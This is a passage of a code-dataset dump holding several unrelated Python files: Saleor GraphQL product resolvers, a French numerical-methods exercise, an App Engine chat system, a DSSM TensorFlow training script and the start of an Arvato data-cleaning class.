resolve_channel(root: ChannelContext[models.Product], _info):\n return root.channel_slug\n\n @staticmethod\n def resolve_background_image(\n root: ChannelContext[models.Collection], info, size=None, format=None\n ):\n node = root.node\n if not node.background_image:\n return\n\n alt = node.background_image_alt\n if not size:\n return Image(url=node.background_image.url, alt=alt)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_background_image(thumbnail):\n url = get_image_or_proxy_url(thumbnail, 
node.id, \"Collection\", size, format)\n return Image(url=url, alt=alt)\n\n return (\n ThumbnailByCollectionIdSizeAndFormatLoader(info.context)\n .load((node.id, size, format))\n .then(_resolve_background_image)\n )\n\n @staticmethod\n def resolve_products(root: ChannelContext[models.Collection], info, **kwargs):\n requestor = get_user_or_app_from_context(info.context)\n qs = root.node.products.visible_to_user( # type: ignore\n requestor, root.channel_slug\n )\n qs = ChannelQsContext(qs=qs, channel_slug=root.channel_slug)\n\n kwargs[\"channel\"] = root.channel_slug\n qs = filter_connection_queryset(qs, kwargs)\n return create_connection_slice(qs, info, kwargs, ProductCountableConnection)\n\n @staticmethod\n def resolve_channel_listings(root: ChannelContext[models.Collection], info):\n return CollectionChannelListingByCollectionIdLoader(info.context).load(\n root.node.id\n )\n\n @staticmethod\n def resolve_description_json(root: ChannelContext[models.Collection], _info):\n description = root.node.description\n return description if description is not None else {}\n\n @staticmethod\n def __resolve_references(roots: List[\"Collection\"], info):\n from ..resolvers import resolve_collections\n\n channels = defaultdict(set)\n roots_ids = []\n for root in roots:\n _, root_id = from_global_id_or_error(root.id, Collection, raise_error=True)\n roots_ids.append(f\"{root.channel}_{root_id}\")\n channels[root.channel].add(root_id)\n\n collections = {}\n for channel, ids in channels.items():\n queryset = resolve_collections(info, channel).qs.filter(id__in=ids)\n\n for collection in queryset:\n collections[f\"{channel}_{collection.id}\"] = ChannelContext(\n channel_slug=channel, node=collection\n )\n\n return [collections.get(root_id) for root_id in roots_ids]\n\n\nclass CollectionCountableConnection(CountableConnection):\n class Meta:\n node = Collection\n\n\n@federated_entity(\"id\")\nclass Category(ModelObjectType):\n id = graphene.GlobalID(required=True)\n seo_title = 
graphene.String()\n seo_description = graphene.String()\n name = graphene.String(required=True)\n description = JSONString(description=\"Description of the category.\" + RICH_CONTENT)\n slug = graphene.String(required=True)\n parent = graphene.Field(lambda: Category)\n level = graphene.Int(required=True)\n description_json = JSONString(\n description=\"Description of the category.\" + RICH_CONTENT,\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `description` field instead.\"\n ),\n )\n ancestors = ConnectionField(\n lambda: CategoryCountableConnection,\n description=\"List of ancestors of the category.\",\n )\n products = ConnectionField(\n ProductCountableConnection,\n channel=graphene.String(\n description=\"Slug of a channel for which the data should be returned.\"\n ),\n description=(\n \"List of products in the category. Requires the following permissions to \"\n \"include the unpublished items: \"\n f\"{', '.join([p.name for p in ALL_PRODUCTS_PERMISSIONS])}.\"\n ),\n )\n children = ConnectionField(\n lambda: CategoryCountableConnection,\n description=\"List of children of the category.\",\n )\n background_image = ThumbnailField()\n translation = TranslationField(CategoryTranslation, type_name=\"category\")\n\n class Meta:\n description = (\n \"Represents a single category of products. 
Categories allow to organize \"\n \"products in a tree-hierarchies which can be used for navigation in the \"\n \"storefront.\"\n )\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.Category\n\n @staticmethod\n def resolve_ancestors(root: models.Category, info, **kwargs):\n return create_connection_slice(\n root.get_ancestors(), info, kwargs, CategoryCountableConnection\n )\n\n @staticmethod\n def resolve_description_json(root: models.Category, _info):\n description = root.description\n return description if description is not None else {}\n\n @staticmethod\n def resolve_background_image(root: models.Category, info, size=None, format=None):\n if not root.background_image:\n return\n\n alt = root.background_image_alt\n if not size:\n return Image(url=root.background_image.url, alt=alt)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_background_image(thumbnail):\n url = get_image_or_proxy_url(thumbnail, root.id, \"Category\", size, format)\n return Image(url=url, alt=alt)\n\n return (\n ThumbnailByCategoryIdSizeAndFormatLoader(info.context)\n .load((root.id, size, format))\n .then(_resolve_background_image)\n )\n\n @staticmethod\n def resolve_children(root: models.Category, info, **kwargs):\n def slice_children_categories(children):\n return create_connection_slice(\n children, info, kwargs, CategoryCountableConnection\n )\n\n return (\n CategoryChildrenByCategoryIdLoader(info.context)\n .load(root.pk)\n .then(slice_children_categories)\n )\n\n @staticmethod\n def resolve_url(root: models.Category, _info):\n return \"\"\n\n @staticmethod\n @traced_resolver\n def resolve_products(root: models.Category, info, *, channel=None, **kwargs):\n requestor = get_user_or_app_from_context(info.context)\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n tree = root.get_descendants(include_self=True)\n if channel is None and not has_required_permissions:\n channel = 
get_default_channel_slug_or_graphql_error()\n qs = models.Product.objects.all()\n if not has_required_permissions:\n qs = (\n qs.visible_to_user(requestor, channel)\n .annotate_visible_in_listings(channel)\n .exclude(\n visible_in_listings=False,\n )\n )\n if channel and has_required_permissions:\n qs = qs.filter(channel_listings__channel__slug=channel)\n qs = qs.filter(category__in=tree)\n qs = ChannelQsContext(qs=qs, channel_slug=channel)\n return create_connection_slice(qs, info, kwargs, ProductCountableConnection)\n\n @staticmethod\n def __resolve_references(roots: List[\"Category\"], _info):\n return resolve_federation_references(Category, roots, models.Category.objects)\n\n\nclass CategoryCountableConnection(CountableConnection):\n class Meta:\n node = Category\n\n\n@federated_entity(\"id\")\nclass ProductMedia(ModelObjectType):\n id = graphene.GlobalID(required=True)\n sort_order = graphene.Int()\n alt = graphene.String(required=True)\n type = ProductMediaType(required=True)\n oembed_data = JSONString(required=True)\n url = ThumbnailField(graphene.String, required=True)\n\n class Meta:\n description = \"Represents a product media.\"\n interfaces = [relay.Node]\n model = models.ProductMedia\n\n @staticmethod\n def resolve_url(root: models.ProductMedia, info, *, size=None, format=None):\n if root.external_url:\n return root.external_url\n\n if not root.image:\n return\n\n if not size:\n return build_absolute_uri(root.image.url)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_url(thumbnail):\n url = get_image_or_proxy_url(\n thumbnail, root.id, \"ProductMedia\", size, format\n )\n return build_absolute_uri(url)\n\n return (\n ThumbnailByProductMediaIdSizeAndFormatLoader(info.context)\n .load((root.id, size, format))\n .then(_resolve_url)\n )\n\n @staticmethod\n def __resolve_references(roots: List[\"ProductMedia\"], _info):\n return resolve_federation_references(\n ProductMedia, roots, 
models.ProductMedia.objects\n )\n\n\nclass ProductImage(graphene.ObjectType):\n id = graphene.ID(required=True, description=\"The ID of the image.\")\n alt = graphene.String(description=\"The alt text of the image.\")\n sort_order = graphene.Int(\n required=False,\n description=(\n \"The new relative sorting position of the item (from -inf to +inf). \"\n \"1 moves the item one position forward, -1 moves the item one position \"\n \"backward, 0 leaves the item unchanged.\"\n ),\n )\n url = ThumbnailField(graphene.String, required=True)\n\n class Meta:\n description = \"Represents a product image.\"\n\n @staticmethod\n def resolve_id(root: models.ProductMedia, info):\n return graphene.Node.to_global_id(\"ProductImage\", root.id)\n\n @staticmethod\n def resolve_url(root: models.ProductMedia, info, *, size=None, format=None):\n if not root.image:\n return\n\n if not size:\n return build_absolute_uri(root.image.url)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_url(thumbnail):\n url = get_image_or_proxy_url(\n thumbnail, root.id, \"ProductMedia\", size, format\n )\n return build_absolute_uri(url)\n\n return (\n ThumbnailByProductMediaIdSizeAndFormatLoader(info.context)\n .load((root.id, size, format))\n .then(_resolve_url)\n )\n","sub_path":"saleor/graphql/product/types/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":68049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"367880054","text":"import numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\ndef iteres_1(n):\r\n res = np.arange(n+1) + 1\r\n while n>0:\r\n res = np.sin(res)\r\n n -= 1\r\n return res\r\n\r\ndef iteres_2(n):\r\n res = (n+1) * [1.]\r\n for i in range(n):\r\n res[i+1] = np.sin(res[i])\r\n return res\r\n\r\ndef x(n):\r\n res = 1\r\n while n>0:\r\n res = np.sin(res)\r\n n -= 1\r\n return res\r\n\r\ndef iteres_3(n):\r\n res = list(range(n+1))\r\n for i in 
res:\r\n res[i] = x(i)\r\n return res\r\n\r\ndef calcu():\r\n n = 100000\r\n print(iteres_2(n)[-1] / math.sqrt(3/n))\r\n\r\n\r\ndef _dessin(u,n,f):\r\n \"\"\"\r\n u : point de depart\r\n n : nbr iteration\r\n f : fonction\r\n \"\"\"\r\n v = u\r\n X = [u]\r\n Y = [0]\r\n for k in range(n):\r\n w = f(v)\r\n X.append(v)\r\n Y.append(w)\r\n X.append(w)\r\n Y.append(w)\r\n\r\n v = w\r\n\r\n #X.append(v)\r\n #Y.append(0)\r\n\r\n plt.plot(X,Y)\r\n plt.plot([0,1],[0,1],\"r\")\r\n\r\n Xsin = [i/1000 for i in range(1000)]\r\n Ysin = []\r\n for x in Xsin:\r\n Ysin.append(math.sin(x))\r\n\r\n plt.plot(Xsin,Ysin,\"g\")\r\n plt.show()\r\n \r\ndef dessin():\r\n def f(x):\r\n return math.sin(x)\r\n u = 1\r\n n = 100\r\n _dessin(u,n,f)\r\n\r\ndef Sn():\r\n n = 1000\r\n X = [i for i in range(n)]\r\n Y = [1]\r\n for k in range(1,n):\r\n l = (-1)**k * x(k)\r\n Y.append(Y[-1] + l)\r\n\r\n\r\n plt.plot(X,Y)\r\n plt.show()\r\n\r\n\r\n\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\r\ndef formatage(L):\r\n M = []\r\n if len(L) == 1:\r\n return M\r\n \r\n for k in range(len(L)-1):\r\n u = L[k+1] - L[k]\r\n if u == 0:\r\n M.append(0)\r\n while u > 0:\r\n M.append(1)\r\n u -= 1\r\n while u < 0:\r\n M.append(-1)\r\n u += 1\r\n return M\r\n\r\n \r\n\r\ndef trace_ascenseur(L):\r\n #L = L = [1,0,2,-1,-1,1,2]\r\n M = formatage(L)\r\n X = [i for i in range(len(M)+1)]\r\n Y = [L[0]]\r\n niveau = L[0]\r\n for x in M:\r\n niveau += x\r\n Y.append(niveau)\r\n plt.plot(X,Y)\r\n plt.grid()\r\n plt.show()\r\n \r\n\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\r\nimport scipy.integrate as integr\r\n\r\n\r\ndef Cauchy():\r\n # x' = -x + cos(10t) , x(0)=3 sur [0,2]\r\n\r\n def 
f(x,t):\r\n return -x + math.cos(10*t)\r\n\r\n X = np.arange(0,2,0.001)\r\n Y = integr.odeint(f,3,X)\r\n plt.plot(X,Y)\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n \r\n Cauchy()\r\n","sub_path":"TP1.py","file_name":"TP1.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227101880","text":"# Python Import ==================\nimport sys\n\n# User Import ======================\nfrom cycle_classes.Start import Start\n\nstrCurrent_path = sys.path[0] \n\nFILE_CYC_INPUT = \"cycle_dat.csv\" # input file for cycle module\nFILE_CYC_OUTPUT = \"cycle_out.csv\" # output file for cycle module\nFILE_CAB2CYC = \"cab2cyc_out.csv\" # output file for cabinit module\n\nFOLDER_INPUT = strCurrent_path + \"\\\\\" + \"data\"\nFOLDER_OUTPUT = strCurrent_path + \"\\\\\" + \"data\"\n \nobj_start = Start(FILE_CYC_INPUT, \n FILE_CYC_OUTPUT, \n FILE_CAB2CYC, \n FOLDER_INPUT, \n FOLDER_OUTPUT)\n\nis_solution = obj_start.main(True) # DEBUG ON\n# is_solution = obj_start.main(False) # DEBUG OFF\n\nobj_start.print_scr_rep(is_solution)\n","sub_path":"App/cycle_start_debug.py","file_name":"cycle_start_debug.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"467223639","text":"\nfrom google.appengine.api import channel\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import polymodel\n\nimport datetime\n\nimport json\nimport logging\n\nfrom chat_settings import ChatSettings, ChatURL\nfrom site_settings import SiteSettings\n\ndef to_iso_format_hack(dt): \n # python datetime is bullshit and doesn't add the Z for iso\n # so isoformat does not actually return isoformat\n # this causes problems in firefox, which interprets it as a local date\n s = dt.isoformat()\n if (not s.endswith('Z')) and \\\n (not s.endswith('+00:00')) and \\\n (not 
s.endswith('-00:00')):\n return s + 'Z'\n else:\n return s\n\nclass ChatUser(polymodel.PolyModel): \n screenname = ndb.StringProperty()\n next_chat_msg_credit = ndb.DateTimeProperty(auto_now_add=True)\n chat_msg_credit = ndb.IntegerProperty(default=0)\n \n @ndb.transactional\n def chat_msg_rate_limit_check(self):\n if self.chat_msg_credit == 0:\n t = datetime.datetime.utcnow()\n if t < self.next_chat_msg_credit:\n return False\n else:\n self.next_chat_msg_credit = t + ChatSettings.CHAT_MSG_INTERVAL\n self.chat_msg_credit = ChatSettings.CHAT_MSG_PER_INTERVAL - 1\n self.put()\n return True\n self.chat_msg_credit -= 1\n self.put()\n return True\n \n def is_operator(self):\n return False\n \n @classmethod\n def channel_connected(cls, channel_user_id):\n args = channel_user_id.split('_')\n u = ChatUser.get_by_id(args[0])\n if u:\n u.handle_channel_connected(args)\n\n @classmethod\n def channel_disconnected(cls, channel_user_id):\n args = channel_user_id.split('_')\n u = ChatUser.get_by_id(args[0])\n if u:\n u.handle_channel_disconnected(args)\n\n def handle_channel_connected(self, vals):\n logging.info(\"connect not implemented?\")\n\n def handle_channel_disconnected(self, vals):\n logging.info(\"disconnect not implemented?\")\n \nclass ChatOperator(ChatUser):\n is_on_call = ndb.BooleanProperty(default=False)\n on_call_channel_token = ndb.StringProperty()\n on_call_channel_token_expiration = ndb.DateTimeProperty(auto_now_add=True)\n calls_answered = ndb.IntegerProperty(default=0)\n\n def is_operator(self):\n return True\n\n @ndb.transactional\n def answered_call(self):\n self.calls_answered += 1\n self.put()\n\n def answer_call(self, call_id):\n call = ChatCall.get_by_id(call_id)\n if not call:\n return None, None, None\n \n room, tok = call.answer(self)\n if not room:\n return None, None, None\n \n self.answered_call()\n\n return call, room, tok\n\n def refresh_calls(self, last_call_datetime):\n for c in ChatCall.calls_since(last_call_datetime):\n msg = 
c.to_operator_json(is_historic=True)\n channel.send_message(self.on_call_channel_token, msg) \n \n @classmethod\n def gauth_user_id(cls, raw_user_id): \n # in case we do non-google logins\n return \"gplus{0}\".format(raw_user_id)\n \n @classmethod\n def gauth_get_or_insert(cls, user_id): \n o = ChatOperator.get_or_insert(user_id)\n if o: \n o.put()\n return o\n\n @classmethod\n def announce_call(cls, call):\n msg = call.to_operator_json()\n operators = cls.query(cls.is_on_call==True).fetch()\n for operator in operators:\n channel.send_message(operator.on_call_channel_token, msg) \n\n @classmethod\n def verify_email(cls, email):\n return SiteSettings.verify_email(email)\n\n def to_on_call_channel_user_id(self):\n return str(self.key.id()) + '_oncall' \n\n def update_rooms(self):\n # find all rooms this user is in and refresh screen name lists\n rooms = ChatRoom.query(ChatRoom.chat_channels.user_key == self.key).fetch(20)\n if not rooms:\n return\n \n for r in rooms:\n r.refresh_screennames() \n \n @ndb.transactional\n def go_on_call(self, check_channel=True):\n # TODO save the date and do date compare\n # also this is bad but meh\n if check_channel:\n t = datetime.datetime.utcnow()\n if (not self.on_call_channel_token) or (t >= self.on_call_channel_token_expiration):\n self.on_call_channel_token = channel.create_channel(self.to_on_call_channel_user_id(),\n ChatSettings.OPERATOR_CHANNEL_MINUTES)\n self.on_call_channel_token_expiration = t + \\\n ChatSettings.OPERATOR_CHANNEL_DURATION\n self.is_on_call = True\n self.put()\n\n @ndb.transactional\n def go_off_call(self):\n self.is_on_call = False\n self.put()\n \n def handle_channel_connected(self, vals):\n if vals[1] == 'oncall':\n # sometimes channel disconnects in dev server\n # TODO: not sure if it's dev server nonsense or local bug\n self.is_on_call = True\n self.put()\n return\n\n def handle_channel_disconnected(self, vals):\n if vals[1] == 'oncall':\n self.go_off_call()\n else:\n room = 
ChatRoom.get_by_id(long(vals[1]))\n if room:\n room.remove_user(self)\n\nclass ChatCaller(ChatUser):\n def remote_addr(self):\n s = str(self.key.id())\n return s[len('caller'):]\n \n @classmethod\n def form_user_id(cls, remote_addr):\n return 'caller{0}'.format(remote_addr)\n\n @classmethod\n def caller_get_or_insert(cls, remote_addr, screenname):\n # TODO: need to make this multiple for people behind proxies/NATs (though unlikely for now)\n if not screenname:\n screenname = ''\n caller = cls.get_or_insert(ChatCaller.form_user_id(remote_addr), screenname=screenname)\n if not caller:\n return None\n \n caller.put()\n \n return caller\n \n def handle_channel_connected(self, vals):\n pass\n\n def handle_channel_disconnected(self, vals):\n room = ChatRoom.get_by_id(long(vals[1]))\n if room:\n room.remove_user(self)\n\nclass ChatChannel(ndb.Model):\n user_key = ndb.KeyProperty(kind=ChatUser)\n room_key = ndb.KeyProperty(kind='ChatRoom')\n channel_token = ndb.StringProperty()\n \nclass ChatRoom(polymodel.PolyModel): \n chat_channels = ndb.StructuredProperty(ChatChannel, repeated=True)\n parent_call = ndb.KeyProperty(kind='ChatCall', default=None)\n \n def has_user_key(self, user_key):\n c = self.get_channel_for_user(user_key)\n if c:\n return c\n else:\n return None\n\n @ndb.transactional\n def remove_user_key_t(self, user_key):\n remove_index = None\n for i, c in enumerate(self.chat_channels):\n if c.user_key == user_key:\n remove_index = i\n break\n if remove_index is not None:\n del self.chat_channels[remove_index]\n self.put()\n\n def remove_user(self, user):\n self.remove_user_key_t(user.key)\n self.announce_user_leave(user)\n \n # better have called room.put() and user.put() at least once so key is valid\n @ndb.transactional\n def add_user_key(self, user_key):\n # TODO: this should be a transaction probably\n c = self.has_user_key(user_key)\n if c:\n return c.channel_token, False\n \n tok = channel.create_channel(self.get_channel_id(user_key), 
ChatSettings.CHAT_CHANNEL_MINUTES) \n if not tok: \n return None, None\n \n self.chat_channels.append(ChatChannel(\n user_key = user_key,\n room_key = self.key,\n channel_token = tok)\n )\n self.put()\n \n return tok, True\n \n def get_channel_id(self, user_key):\n return '{0}_{1}'.format(user_key.id(), self.key.id()) \n\n def get_channel_for_user(self, user_key):\n for c in self.chat_channels:\n if c.user_key == user_key:\n return c\n return None\n \n def get_screennames(self):\n def user_key_to_screenname(user_key):\n u = user_key.get()\n if u:\n return u.screenname\n else:\n return \"\"\n \n return [ user_key_to_screenname(c.user_key) for c in self.chat_channels ]\n\n def refresh_screennames(self): \n msg = json.dumps({\n 'content' : 'screennames',\n 'screennames' : self.get_screennames(),\n })\n for chan in self.chat_channels:\n channel.send_message(chan.channel_token, msg) \n\n def announce_user_join(self, user):\n msg = json.dumps({\n 'content' : 'announcement',\n 'line' : u'{0} has joined the room'.format(user.screenname),\n })\n for chan in self.chat_channels:\n if chan.user_key != user.key:\n channel.send_message(chan.channel_token, msg) \n\n def announce_user_leave(self, user):\n msg = json.dumps({\n 'content' : 'announcement',\n 'line' : u'{0} has left the room'.format(user.screenname),\n })\n for chan in self.chat_channels:\n if chan.user_key != user.key:\n channel.send_message(chan.channel_token, msg) \n \nclass ChatCall(ndb.Model):\n caller_channel = ndb.StructuredProperty(ChatChannel)\n call_datetime = ndb.DateTimeProperty(auto_now_add=True) \n answered_datetime = ndb.DateTimeProperty(default=None)\n answered_by = ndb.KeyProperty(kind=ChatOperator, default=None)\n\n def caller_url(self):\n return '/room?room={0}&call={1}'.format(self.caller_channel.room_key.id(), self.key.id())\n\n def operator_url(self):\n return \"{0}?call_id={1}\".format(ChatURL.OANSWER, self.key.id())\n \n def to_operator_json(self, is_historic = False): \n msg = {\n 'call_id' : 
self.key.id(),\n 'call_url' : self.operator_url(),\n 'call_date' : to_iso_format_hack(self.call_datetime),\n }\n if is_historic:\n msg['is_historic'] = 1\n if not self.answered_datetime is None:\n msg['call_answered'] = str(self.answered_datetime)\n\n return json.dumps(msg)\n\n @ndb.transactional\n def mark_answered(self, operator):\n if self.answered_by is None:\n self.answered_by = operator.key\n self.put()\n return True\n elif self.answered_by == operator.key:\n return True\n else:\n return False\n \n def answer(self, operator):\n try:\n won = self.mark_answered(operator)\n except:\n logging.info('{0}: operator {1} call {2}'.format(e, operator, call))\n won = False\n\n if not won:\n return None, None\n \n room = self.caller_channel.room_key.get()\n if not room:\n logging.info('no room')\n return None, None\n\n try:\n tok, added = room.add_user_key(operator.key)\n except Exception as e:\n # could be transaction failure\n logging.info('{0}: room {1} operator {2}'.format(e, room, operator))\n tok = None\n \n if not tok:\n return None, None \n \n self.answered_datetime = datetime.datetime.utcnow()\n self.put() \n return room, tok\n\n @classmethod\n def calls_since(cls, last_call_datetime):\n # get 20 most recent, but sort from earliest time\n return sorted(\n cls.query(cls.call_datetime > last_call_datetime).order(-cls.call_datetime).fetch(20),\n key=lambda c: c.call_datetime)\n \n @classmethod\n def factory(cls, caller_key):\n call = ChatCall()\n if not call:\n return None\n \n room = ChatRoom()\n if not room:\n # call isn't put, so should be okay?\n return None\n\n call.put() # so call.key is valid\n room.parent_call = call.key\n room.put() # so room.key is valid\n\n tok, newly_added = room.add_user_key(caller_key)\n if not tok:\n call.key.delete()\n room.key.delete()\n return\n \n call.caller_channel = ChatChannel(user_key = caller_key,\n room_key = room.key,\n channel_token = tok)\n call.put()\n return call\n\nclass ChatMsg(ndb.Model):\n user_key = 
ndb.KeyProperty(kind=ChatUser) \n room_key = ndb.KeyProperty(kind=ChatRoom)\n msg = ndb.StringProperty()\n sent_datetime = ndb.DateTimeProperty(auto_now_add=True) \n","sub_path":"chat_objs.py","file_name":"chat_objs.py","file_ext":"py","file_size_in_byte":12912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288755490","text":"from DSSM.batchiterators.fileiterators import NaturalQuestionsFileIterator\nfrom DSSM.dssm.model import *\nimport numpy as np\nfrom tqdm import tqdm\nfrom matplotlib import pyplot as plt\n\nfrom DSSM.helpers.helpers import correct_guesses_of_dssm\n\ninit = tf.compat.v1.global_variables_initializer()\n\nsaver = tf.compat.v1.train.Saver()\n\n# First just train on nq\ndef get_feed_dict(batch):\n q_indices_batch = batch.get_q_indices()\n p_indices_batch = batch.get_relevant_indices()\n n1_indices_batch, n2_indices_batch, n3_indices_batch, n4_indices_batch = batch.get_irrelevant_indices()\n\n q_values_batch = np.ones(q_indices_batch.shape[0], dtype=int)\n p_values_batch = np.ones(p_indices_batch.shape[0], dtype=int)\n n1_values_batch = np.ones(n1_indices_batch.shape[0], dtype=int)\n n2_values_batch = np.ones(n2_indices_batch.shape[0], dtype=int)\n n3_values_batch = np.ones(n3_indices_batch.shape[0], dtype=int)\n n4_values_batch = np.ones(n4_indices_batch.shape[0], dtype=int)\n\n feed_dict = {\n q_indices: q_indices_batch,\n q_values: q_values_batch,\n p_indices: p_indices_batch,\n p_values: p_values_batch,\n n1_indices: n1_indices_batch,\n n1_values: n1_values_batch,\n n2_indices: n2_indices_batch,\n n2_values: n2_values_batch,\n n3_indices: n3_indices_batch,\n n3_values: n3_values_batch,\n n4_indices: n4_indices_batch,\n n4_values: n4_values_batch\n }\n return feed_dict\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nplt.ion()\n\nfig.show()\nfig.canvas.draw()\n\n\ndef update_plot(data1, data2):\n ax.clear()\n ax.plot(data1)\n ax.plot(data2)\n ax.set_ylim(bottom=0)\n fig.canvas.draw()\n 
# `start_event_loop` is required for console, not jupyter notebooks.\n # Don't use `plt.pause` because it steals focus and makes it hard\n # to stop the app.\n fig.canvas.start_event_loop(0.001)\n\n\nwith tf.compat.v1.Session() as sess:\n sess.run(init)\n\n train_epoch_accuracies = []\n train_losses = []\n val_epoch_accuracies = []\n val_losses = []\n\n trainingSet = NaturalQuestionsFileIterator(\"/Users/sahandzarrinkoub/School/year5/thesis/datasets/preprocessed_backup/nq/smalltrain.csv\",\n batch_size = BATCH_SIZE,\n no_of_irrelevant_samples = 4,\n encodingType=\"NGRAM\")\n validationSet = NaturalQuestionsFileIterator(\"/Users/sahandzarrinkoub/School/year5/thesis/datasets/preprocessed_backup/nq/smallvalidation.csv\",\n batch_size=BATCH_SIZE,\n no_of_irrelevant_samples=4,\n encodingType=\"NGRAM\")\n for epoch in range(10):\n if epoch > 0:\n trainingSet.restart()\n validationSet.restart()\n\n ll_train_overall = 0\n correct_train = 0\n for batch in tqdm(trainingSet):\n feed_dict = get_feed_dict(batch)\n\n _, ll = sess.run([optimizer, logloss], feed_dict=feed_dict)\n print(ll)\n ll_train_overall += ll\n correct_train += correct_guesses_of_dssm(sess, feed_dict, prob_p, prob_n1, prob_n2, prob_n3, prob_n4)\n\n train_losses.append(ll_train_overall / trainingSet.getNoOfDataPoints())\n train_epoch_accuracies.append(correct_train / trainingSet.getNoOfDataPoints())\n\n\n #evaluate on validation set\n ll_val_overall = 0\n correct_val = 0\n for batch in validationSet:\n feed_dict = get_feed_dict(batch)\n (ll_val,) = sess.run([logloss], feed_dict=feed_dict)\n correct_val += correct_guesses_of_dssm(sess, feed_dict, prob_p, prob_n1, prob_n2, prob_n3, prob_n4)\n ll_val_overall += ll_val\n val_losses.append(ll_val_overall / validationSet.getNoOfDataPoints())\n val_epoch_accuracies.append(correct_val / validationSet.getNoOfDataPoints())\n\n update_plot(train_losses, val_losses)\n\n plt.figure()\n plt.plot(train_epoch_accuracies)\n plt.plot(val_epoch_accuracies)\n 
plt.xlabel(\"epoch\")\n plt.ylabel(\"accuracy\")\n plt.title(\"accuracies\")\n plt.figure()\n plt.plot(train_losses)\n plt.plot(val_losses)\n plt.xlabel(\"batch\")\n plt.title(\"loss\")\n plt.show()\n saver.save(sess, './saved_model', global_step=epoch)\n","sub_path":"dssm/dssm_word_vs_ngram.py","file_name":"dssm_word_vs_ngram.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"347232412","text":"\"\"\"\nDescription\n-----------\n\n This module is linked to the Arvato Project Workbook (jupyterlab notebook). Many explanation is given in the workbook. \n\n\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n\n\nclass PreDataCleaner:\n \"\"\"\n Description\n -----------\n\n This class will provide some functionality to execute some basic cleanining \n a arvato data set\n \"\"\"\n \n \n @property\n def df_metadata(self):\n return self.__df_metadata\n \n @df_metadata.setter\n def df_metadata(self, val):\n self.__df_metadata = val \n \n def __init__(self, df_metadata:pd.DataFrame):\n \"\"\"\n Description\n -----------\n\n inits the class.\n \n Parameters\n ----------\n df_metadata: pd.DataFrame\n pandas dataframe with the loaded data from file \"DIAS Attributes - Values 2017.xlsx\". 
Containing\n information about the attribute values.\n \"\"\"\n self.df_metadata = df_metadata\n\n # replace the metadata attribute column ending \"_RZ\" by \"\" in order to match the dataset column names\n self.df_metadata['Attribute'] = self.df_metadata['Attribute'].str.replace('_RZ','')\n\n \n def transform(self, df:pd.DataFrame, drop_duplicates:bool=False, build_kind_features:bool=True, drop_cols:bool=True)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n executes the data transformation (cleaning)\n\n Parameters\n ----------\n\n df : pd.DataFrame\n the dataframe that is to be cleaned\n\n \"\"\" \n df = self.__drop_customer_columns(df)\n df = self.__handle_data_load_errors(df)\n \n if drop_duplicates:\n df.drop_duplicates(inplace=True)\n \n df = self.__fix_year_columns(df)\n df = self.__mark_nans(df)\n \n if build_kind_features:\n df = self.__build_features_chidren(df, drop_childcols=False)\n \n df = self.__catvars_to_dummies(df) \n df = self.__catvars_to_binary(df) \n \n if drop_cols: \n df = self.__drop_columns(df) \n \n return df\n \n \n def fit (self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n prepare data for transformation\n \"\"\"\n\n pass\n \n def __fix_year_columns(self, df:pd.DataFrame) ->pd.DataFrame:\n \"\"\"\n Description\n ------------\n \n converts year columns to int\n \"\"\" \n cols = ['MIN_GEBAEUDEJAHR','EINGEZOGENAM_HH_JAHR','GEBURTSJAHR']\n print(f'fixing year columns: {cols}')\n for col in cols:\n df[col].fillna(df[col].median(), inplace=True)\n df[col].astype('int')\n \n \n return df\n \n \n\n \n def __drop_customer_columns (self, df:pd.DataFrame, columns_to_drop:bool=None)->pd.DataFrame:\n \"\"\"\n drop additional coloumns of the customer dataset\n \"\"\"\n cols = ['CUSTOMER_GROUP', 'ONLINE_PURCHASE', 'PRODUCT_GROUP'] \n \n if cols[0] in df.columns:\n print(f'Dropping customer dataset cols: {cols}')\n df = self.__drop_columns(df, cols)\n \n return df\n \n \n \n def __handle_data_load_errors(self, 
